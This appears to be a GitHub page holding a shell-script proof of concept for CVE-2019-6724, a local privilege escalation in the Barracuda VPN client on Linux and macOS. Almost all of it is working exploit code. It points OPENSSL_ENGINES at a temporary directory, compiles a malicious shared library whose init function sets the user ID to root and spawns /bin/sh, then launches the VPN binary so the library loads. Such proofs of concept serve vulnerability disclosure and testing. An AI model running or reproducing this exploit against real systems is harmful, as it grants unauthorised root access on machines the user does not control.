Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
executable file 51 lines (41 sloc) 965 Bytes
#!/bin/sh
# PoC for CVE-2019-6724 Barracuda VPN Client Privilege Escalation
# Linux / macOS
# Rich Mirch
#
# Version tested:
#
# Barracuda Networks VPN client version: PhionVersionString 5.0.2.5
#
# OS tested:
#
# CentOS Linux release 7.4.1708 (Core)
# macOS 10.14.2
#
STAGE=$(mktemp -d /tmp/woot.XXXXXX)
cd ${STAGE?} || exit 1
export OPENSSL_ENGINES=${STAGE?}
cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
u=$(uname)
gcc -fPIC -o woot.o -Wall -c woot.c
if [[ $u = "Linux" ]]
then
gcc -Wall -shared -Wl,-soname,libcavium.so -Wl,-init,woot -o ${STAGE?}/libcavium.so woot.o
/usr/local/bin/barracudavpn
elif [[ $u = "Darwin" ]]
then
gcc -Wall -dynamiclib -Wl,-init,_woot -o ${STAGE?}/libcavium.dylib woot.o
/Applications/BarracudaVPNClient.app/Contents/MacOS/barracudavpn.engine
else
echo "Error: OS not supported"
exit 1
fi
rm -rf ${STAGE?}
You can’t perform that action at this time.